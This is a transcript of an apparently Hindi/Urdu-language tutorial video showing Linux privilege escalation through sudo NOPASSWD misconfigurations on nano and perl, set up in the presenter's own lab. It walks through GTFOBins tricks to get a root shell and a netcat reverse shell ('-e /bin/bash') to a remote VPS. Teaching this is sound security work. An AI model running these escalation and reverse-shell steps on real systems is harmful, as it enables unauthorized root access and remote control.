अस्सलाम वालेकुम एवरीवन, दिस इज मुस्तफ़ा खान। आज की वीडियो में हम बात करने वाले हैं प्रिविलेज एस्केलेशन की। हम पहले ही बात कर चुके हैं कि प्रिविलेज एस्केलेशन क्या होती है और कुछ टेक्निक्स को हम डिस्कस कर चुके हैं। आज की वीडियो में हम बात करेंगे सूडो मिसकॉन्फ़िगरेशन की कि हम किस तरह सूडो मिसकॉन्फ़िगरेशन के थ्रू अपने प्रिविलेज को एस्केलेट कर सकते हैं और ये काम हम किस तरह करवा सकते हैं ये हम थोड़ी ही देर में देखने वाले हैं। तो चलिए स्टार्ट करते हैं। आज की डेमोन्स्ट्रेशन पर्पस के लिए एक अकाउंट क्रिएट करते हैं जहां पर हम तमाम सूडो मिसकॉन्फ़िगरेशन के हवाले से बात करेंगे। फ्रेश अकाउंट है तो जहां पर किसी तरह की कोई कंफ्यूजन नहीं होगी। सबसे पहले अकाउंट क्रिएट करवा लेते हैं और एक और टर्मिनल ओपन कर लेते हैं। लेट्स से ओपन टर्मिनल। चलते हैं यहाँ पे एंड देन यहाँ पे एक फाइल क्रिएट करते हैं जहां पर हमने यूजर नेम एंड देन पासवर्ड, यूजर नेम मुसब रखेंगे एंड द पासवर्ड ऑफ यूजर नेम इज काली। कॉपी कर लेते हैं। अब यहाँ पे लॉगिन कर लेते हैं। यहाँ पे लॉगिन करते हैं रूट यूजर के साथ। ओके, ऐड यूजर मुसब। इस कमांड के साथ हम एक अकाउंट क्रिएट करवा रहे हैं जिसका नाम है मुसब और यहाँ पर पासवर्ड रिक्वायर्ड है। पासवर्ड पेस्ट करवा देते हैं। अगेन पेस्ट एंड गो एंड अकाउंट यहाँ पर क्रिएट हो चुका है। अब अगर हम यहाँ पे इसे क्लोज करें और दोबारा से ओपन टर्मिनल पे जाएं एंड देन स्विच यूज़र करवाएं मुसब और यहाँ पे लॉगिन करें मुसब के साथ, तो हम यहाँ पर मुसब अकाउंट के साथ लॉगिन कर चुके हैं। अब यहाँ पे देख लेते हैं, क्योंकि ये एक फ्रेश अकाउंट है तो यहाँ पर किसी तरह की मिसकॉन्फ़िगरेशन पहले से होने के चांसेस नहीं है। अब अगर कहीं पर मिसकॉन्फ़िगरेशन है सूडो की तो वो हम किस तरह देख सकते हैं। उसके लिए आप ये कमांड इस्तेमाल कर सकते हैं सूडो एल। सूडो एल आपको क्या बताती है? सूडो एल आपको ये बताता है कि यूज़र मुसब कौन कौन सी कमांड हैं जो कि सूडो के साथ एग्जीक्यूट कर सकता है पासवर्ड प्रोवाइड किए बगैर। अब हम यहाँ पे सूडो एल को एंटर करवा लेते हैं। अब यहाँ पे एक पासवर्ड प्रॉम्प्ट आ गया है। पासवर्ड प्रॉम्प्ट इस बात की इंडिकेशन है कि यहाँ पर कोई भी मिसकॉन्फ़िगरेशन या कोई और कमांड ऐसी नहीं है जो आपको अलाउ की हुई हो, अदरवाइज आपको ये प्रॉम्प्ट नज़र नहीं आता। यहाँ पर हम पासवर्ड देके देख लेते हैं कि पासवर्ड देने के बाद यहाँ पर क्या रिस्पांस मिल रहा है। लेट्स से हमने कहा काली। हम यहाँ पर सूडो की कोई कमांड एग्जीक्यूट नहीं कर सकते, ठीक है, क्योंकि इस तरह की कोई मिसकॉन्फ़िगरेशन करंटली यहाँ पर मौजूद नहीं है। अब चलते हैं अपने दूसरे टर्मिनल की तरफ और यहाँ पर हम लॉगिन कर लेते हैं रूट यूज़र के साथ और रूट यूज़र के साथ हम एक छोटी सी लैब इन्वायरमेंट यहाँ पे क्रिएट करवाएंगे जहाँ पर हम इंटेंशनली एक मिसकॉन्फ़िगरेशन ऐड करवाएंगे जिसके थ्रू हम अपनी प्रिविलेज एस्केलेशन की वीडियो को आगे लेके चलेंगे। जहाँ पर हम अपने प्रिविलेज को एस्केलेट करेंगे और रूट यूज़र को जो भी प्रिविलेज है वो हम अचीव कर लेंगे एक्सप्लॉइट करते हुए मुसब यूज़र के साथ। हमने कहा वी आई सूडो क्या काम करता है? सूडो फाइल को एडिट करके देता है विच इज़ दिस। इस फाइल को हम एडिट करवाते हैं वी आई सूडो कमांड के थ्रू। यहाँ पर तमाम सूडो की इंफॉर्मेशन आप देख सकते हैं कि एक यूज़र यहाँ पे है रूट और तमाम परमिशन जो रूट यूज़र को दी हुई है वो यहाँ पे डिफाइन की हुई। अब अगर सेम परमिशन मैं यहाँ पर दूँ या मैं यहाँ पर डिफाइन करता हूँ अपनी परमिशन विच इज़ दिस। हमने कहा मुसब यूज़र को परमिशन दें एंड ऑल मतलब के तमाम टर्मिनल इक्वल्स टू ऑल का मतलब यहाँ पर यह है कि ऑल यूजर्स कॉलम ऑल ग्रुप। सबसे पहले यहाँ पे यूजर्स डिफाइन किए, यहाँ पे हमने कॉलम डिफाइन किया, ग्रुप डिफाइन किया एंड देन यहाँ पर जो ऑल है विच मीन्स कि यहाँ पे कमांड्स की बात हो रही है कि हम यहाँ पे कौन कौन सी कमांड एग्जीक्यूट करवा सकते हैं। रूट यूजर है वो तमाम कमांड यहाँ पर एग्जीक्यूट करवा सकता है, लेकिन हम यहाँ पर एक मिसकॉन्फ़िगरेशन ऐड कर रहे हैं। मिसकॉन्फ़िगरेशन किस चीज़ की है यहाँ पे कि हम किस तरह सूडो के साथ हम कोई कमांड एग्जीक्यूट करते हैं लेकिन अब पासवर्ड प्रोवाइड किए बगैर उसे एग्जीक्यूट करवाते हैं सूडो प्रिविलेज के साथ। हमने कहा यहाँ पे नो पासवर्ड विच मीन्स कि हम यहाँ पे पासवर्ड प्रोवाइड नहीं कर रहे और उसके बावजूद हम इसको नैनो को एग्जीक्यूट करवाएंगे सूडो प्रिविलेज के साथ पासवर्ड प्रोवाइड किए बगैर। और यहाँ पर एक और देख लेते हैं पर्ल। हम यहाँ पर मल्टीपल बाइनरी स्क्रिप्ट या कोई कमांड डिफाइन कर सकते हैं जो कि सूडो के साथ एग्जीक्यूट करवाई जा सकती है। दिस इज द मिसकॉन्फ़िगरेशन। अब यहाँ पर प्रॉब्लम तब क्रिएट होती है जब कोई ऐसी बाइनरी, ऐसी फाइल या कोई ऐसी स्क्रिप्ट यहाँ पर हम ऐड करवा दें जो के सिस्टम कॉल एग्जीक्यूट करवा सके।
लेट्स से अगर यहाँ पे नैनो हमने ऐड करवाया है और नैनो के अंदर कोई फंक्शनैलिटी है जिसकी वजह से हम कोई सिस्टम कॉल एग्जीक्यूट करवा सकते हैं, देन नैनो की वजह से हम रूट प्रिविलेज के साथ सिस्टम कमांड को एग्जीक्यूट करवा सकते हैं, ओएस की कमांड को एग्जीक्यूट करवा सकते हैं जो कि रूट प्रिविलेज के साथ एग्जीक्यूट होगी, जिसकी वजह से हम अपने प्रिविलेज को एस्केलेट कर सकते हैं। तो ये एक कंडीशन है कि आप कोई भी स्क्रिप्ट डिफाइन करें, कोई बाइनरी यहाँ पे डिफाइन करें, कोई और एग्जीक्यूटेबल यहाँ पर हो, हर सूरत के अंदर आपकी जो डिफाइंड चीज़ है वो बैकएंड के ऊपर सिस्टम कमांड करने की फंक्शनैलिटी रखती हो, जिसकी वजह से आप अपने प्रिविलेज को एस्केलेट करवा सकते हैं। अब नैनो और पर्ल दोनों ही के अंदर ये फंक्शनैलिटी है कि जहाँ पर हम अपनी ओएस की कमांड को एग्जीक्यूट करवा सकते हैं। किस तरह करवा सकते हैं ये हम थोड़ी ही देर में देखने वाले हैं। फिलहाल इसको सेव करवा लेते हैं और हम यहाँ पे इसको क्लोज करवा देते हैं। अब चलते हैं यहाँ पे और हमने टाइप करा sudo -l। एज यू कैन सी अब यहाँ पर हमें कोई पासवर्ड देने की ज़रूरत नहीं पड़ी और जो भी यहाँ पर xyz कमांड हम एग्जीक्यूट कर सकते हैं वो लिस्ट डाउन हो गई और रिफ्लेक्शन में आ रही है। और यहाँ पे क्या लिखा हुआ है, विच इज यूजर मुसब में रन द फॉलोइंग कमांड्स ऑन ओएस बॉक्सेस। ओएस बॉक्सेस के ऊपर मैं ये तमाम कमांड्स को एग्जीक्यूट करवा सकता हूँ विद नो पासवर्ड। मुझे सूडो पासवर्ड डिफाइन करने की ज़रूरत नहीं है, मतलब जो पासवर्ड ओएस बॉक्सेस पे रूट का है मुझे वो डिफाइन करने की ज़रूरत या प्रोवाइड करने की ज़रूरत नहीं है। हम एक बार इसको क्लोज करते हैं एंड दोबारा से यहाँ पे टर्मिनल ओपन करते हैं ताकि चीज़ें रिफ्रेश हो जाएं। मैंने कहा मुसब और यहाँ पे हमने कहा sudo su एंड और sudo musab। ओके, अब देख लेते हैं यहाँ पे sudo -l, यहाँ पर सेम आउटपुट हमें फिलहाल नजर आ रहा है। अब चलते हैं अपने GTFO bin की तरफ, जहाँ पर हम लास्ट वीडियो में भी हमने बात की थी कि जहाँ पर तमाम बाइनरी यूटिलिटीज मौजूद हैं जिनके थ्रू आप अपने प्रिविलेज को एस्केलेट करवा सकते हैं। हम वहाँ पर ये दोनों ही बाइनरीज को या दोनों ही यूटिलिटीज को देख लेंगे कि हम किसके थ्रू अपने प्रिविलेज को एस्केलेट करवा सकते हैं और वो क्या कमांड हैं जिसके थ्रू हम अपने प्रिविलेज को एस्केलेट करवा सकते हैं। यहाँ पे नैनो यहाँ पे ऑलरेडी खुला हुआ है, विच इज़ Ctrl+R एंड Ctrl+X आप प्रेस करेंगे, जो कि हमने लास्ट वीडियो के अंदर भी बात की थी। तो फिर आप सिस्टम की कमांड नैनो के थ्रू एग्जीक्यूट करवा सकते हैं। एक बार देख लेते हैं कि क्या कह रहा है। हमने कहा sudo nano और यहाँ पर मैं बता रहा है GTFO bins कि अगर आप Ctrl+R और Ctrl+X प्रेस करें तो फिर आप सिस्टम की कमांड्स को एग्जीक्यूट करवा सकते हैं। तो कहा Ctrl+R एंड Ctrl+X। अब यहाँ पे आप देख सकते हैं कमांड टू एग्जीक्यूट, हमने कहा who am I। अब जो भी कमांड यहाँ पर एग्जीक्यूट हो रही है वो रूट प्रिविलेज के साथ एग्जीक्यूट हो रही है। इसका मतलब ये है कि अब मैं यहाँ पर रूट प्रिविलेज के साथ अपनी कमांड को एग्जीक्यूट करवा सकता हूँ और अगर मैं बैक कनेक्ट करना चाहूँ सूडो प्रिविलेज के साथ तो भी मैं बैक कनेक्ट करवा के एक प्रॉपर शेल अपना ले सकता हूँ, रूट का शेल में ले सकता हूँ रूट प्रिविलेज के साथ। तो हम कैंसिल करवा लेते हैं, ओके। और सबसे पहले देख लेते हैं क्या हम यहाँ पर अपना शेल ले सकते हैं, नहीं ले सकते। लॉगिन कर लेते हैं अपने VPS पे, ऐसे सर्च करवा लेते हैं रूट एंड देन यहाँ पर हमने IP दे दी। ओके, लिसनिंग मोड पे लगा लेते हैं 8888 पोर्ट पे। अब यहाँ पर यही काम करवाते हैं और देख लेते हैं sudo और नैनो करके Ctrl+R एंड Ctrl+X। क्या हम अपनी नेटकैट की कमांड एग्जीक्यूट करवा सकते हैं? सबसे पहले देख लेते हैं क्या नेटकैट यहाँ पर इंस्टॉल है या नहीं है। नेटकैट यहाँ पर करंटली इंस्टॉल नहीं है। apt इंस्टॉल नेटकैट, नेटकैट को इंस्टॉल कर लेते हैं। ओके ओके, नेटकैट यहाँ पे इंस्टॉल हो चुका है। अब यहाँ पे चलते हैं अपने कमांड की तरफ 128.28 एंड 156 पोर्ट 8888-E एंड देन bin bash। ये कमांड क्या कह रही है? ये कमांड कह रही है कि आपने जाके इस IP को इस पोर्ट पे कनेक्ट करना है और जैसे ही आप कनेक्ट हो जाएं तो आपने फ़ौरन ही प्रोग्राम करंट लोकल सिस्टम से एक प्रोग्राम को एग्जीक्यूट करवाना है विच इज़ बैश। जैसे ही हम कनेक्ट कर जाएंगे तो हमें यहाँ पे एक बैश का शेल मिल जाएगा।
यहाँ पे देख लेते हैं। अब हमें कनेक्शन रिसीव हो चुका है। हमने कहा हुआ MI PWD एंड LS करवा लेते हैं threads.txt वो सब काली, विच मीन्स कि हम सक्सेसफुली अपने प्रिविलेज को एस्केलेट करवा चुके हैं। अब इसको यहाँ पे करवाते हैं कैंसिल और दोबारा चलते हैं मिस कॉन्फ़िगरेशन की तरफ। और दूसरी जो यूटिलिटी थी विच इज़ पर्ल, के हम पर्ल के थ्रू भी अपने प्रिविलेज को एस्केलेट करवा सकते हैं, वो भी एक बार देख लेते हैं। चलते हैं पर्ल की तरफ। ये पर्ल के अंदर अगर हम ये कमांड एग्जीक्यूट करवाएं तो हम एक शेल ले सकते हैं और देख लेते हैं क्या ये काम कर रही है कमांड या नहीं कर रही। हमने कहा हम सूडो के साथ ये प्रिविलेज कमांड को एग्जीक्यूट करवा सकते हैं और किसी भी तरह का कोई पासवर्ड प्रॉम्प्ट नहीं होगा। अगर मैं खाली आपको सूडो के साथ विम एग्जीक्यूट करके दिखाऊं तो ये पासवर्ड का प्रॉम्प्ट दे रहा है, विच मीन्स कि हम विम को सूडो के साथ एग्जीक्यूट करवाएंगे तो हमें प्रिविलेज के लिए पासवर्ड प्रोवाइड करना पड़ेगा। लेकिन अगर मैं सूडो एग्जीक्यूट करवाऊं पर्ल के साथ, अगर मैं इस पूरी कमांड को कॉपी कर लूं तो फिर मुझे पासवर्ड की प्रॉम्प्ट नजर नहीं आएगी। क्यों? क्योंकि हमने यहाँ पर डिफाइन किया हुआ है कि आप ये कमांड सूडो के साथ रन कर सकते हैं विद हाईएस्ट प्रिविलेज। हमने यहाँ पे एंटर किया और एज यू कैन सी एक पाउंड साइन शो हो रहा है हमें, विच इज द इंडिकेशन ऑफ रूट। हु एम आई रूट। अब यहाँ पे हम देख सकते हैं कि हम सक्सेसफुली रूट यूजर का एक्सेस ले चुके हैं। अब अगर सेम काम करवाऊं मैं दोबारा से लिसनिंग मोड पे आ जाते हैं और netcat 178, 28, 156 एंड 8888 पोर्ट के ऊपर इन्वोक करवा रहे हैं हम बैश का शेल। जैसे ही हम कनेक्ट कर जाएंगे तो यहाँ पर एक कनेक्शन हमें नजर आ जाएगा। एज यू कैन सी कनेक्शन फ्रॉम दिस IPN पोर्ट। हमने कहा हु एम आई PWD एंड कैट करवा के देख लेते हैं threads.txt वो सब काली। अब यहाँ पे ये चीज़ काम कर रही है और यहाँ पे अब ये जो भी कनेक्शन है वो ब्रेक हो चुका है। तो एज यू कैन सी हम इस तरह अपने प्रिविलेज को एस्केलेट करवा सकते हैं सूडो मिस कॉन्फ़िगरेशन के साथ। अगर आपकी कोई क्वेरी हो तो वो आप मुझे कमेंट सेक्शन में बता सकते हैं। लास्ट टाइम हमने प्रिविलेज एस्केलेशन की बात की थी SUID बिट की, जिसके थ्रू हमने प्रिविलेज को एस्केलेट करवाए थे। लेकिन वहाँ पे एक प्रॉब्लम ये था कि जब भी हम नैनो के थ्रू प्रिविलेज एस्केलेट करवा के बैक कनेक्ट करवा रहे थे तो बैक कनेक्ट जो हमें मिल रहा था वो हमें OS बॉक्सेस का मिल रहा था। और करंटली जब हम वही काम करवा रहे हैं नैनो के अंदर विद सूडो तो हमें डायरेक्टली रूट का एक्सेस मिल रहा है, नैनो के अंदर OS बॉक्सेस का एक्सेस नहीं मिल रहा। तो यहाँ पे फाइल ऑनर और फाइल परमिशन की कुछ कॉम्प्लिकेशन है। अगर आपको लास्ट वीडियो में ये बात समझ में नहीं आई थी या मुश्किल थी समझने में तो वो आप मुझे कमेंट सेक्शन में बता सकते हैं। अपना ख्याल रखिएगा, मिलते हैं अगली वीडियो में। थैंक यू, अल्लाह हाफ़िज़।